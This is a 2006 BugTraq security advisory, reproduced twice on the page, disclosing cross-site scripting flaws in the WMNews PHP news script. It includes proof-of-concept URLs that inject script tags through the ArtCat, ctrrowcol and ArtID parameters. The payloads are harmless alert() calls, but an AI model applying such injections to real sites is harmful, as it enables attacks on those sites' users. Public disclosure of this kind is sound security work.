BugTraq
Back to list
|
Post reply
WMNews Cross Site Scripting
Mar 12 2006 08:50PM
exalibur33 gmail com
------------------------------------------------------------------------
-------------
WMNews Cross Site Scripting
Site:http://wartamikael.org/PHPScripts/
Demo:http://www.scriptevi.com/files/demo/news/wmnews/
---------------------------------------------------
Credit : R00T3RR0R
webpage:www.biyosecurity.be
Mail :exalibur33 (at) gmail (dot) com [email concealed]
------------------------------------------------------------------------
-------------
WMNews
http://victim/path/wmview.php?ArtCat="><script>alert(/R00T3RR0R/)</scrip
t>
http://victim/path/footer.php?ctrrowcol="><script>alert(/R00T3RR0R/)</sc
ript>
http://victim/path/wmcomments.php?act=vi&CmID=2&ArtID="><script>alert(/R
00T3RR0R/)</script>
------------------------------------------------------------------------
----------------
Source:
http://www.blogcu.com/Liz0ziM/350164/
http://biyosecurity.be/bugs/wmnews.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
-------------
WMNews Cross Site Scripting
Site:http://wartamikael.org/PHPScripts/
Demo:http://www.scriptevi.com/files/demo/news/wmnews/
---------------------------------------------------
Credit : R00T3RR0R
webpage:www.biyosecurity.be
Mail :exalibur33 (at) gmail (dot) com [email concealed]
------------------------------------------------------------------------
-------------
WMNews
http://victim/path/wmview.php?ArtCat="><script>alert(/R00T3RR0R/)</scrip
t>
http://victim/path/footer.php?ctrrowcol="><script>alert(/R00T3RR0R/)</sc
ript>
http://victim/path/wmcomments.php?act=vi&CmID=2&ArtID="><script>alert(/R
00T3RR0R/)</script>
------------------------------------------------------------------------
----------------
Source:
http://www.blogcu.com/Liz0ziM/350164/
http://biyosecurity.be/bugs/wmnews.txt
[ reply ]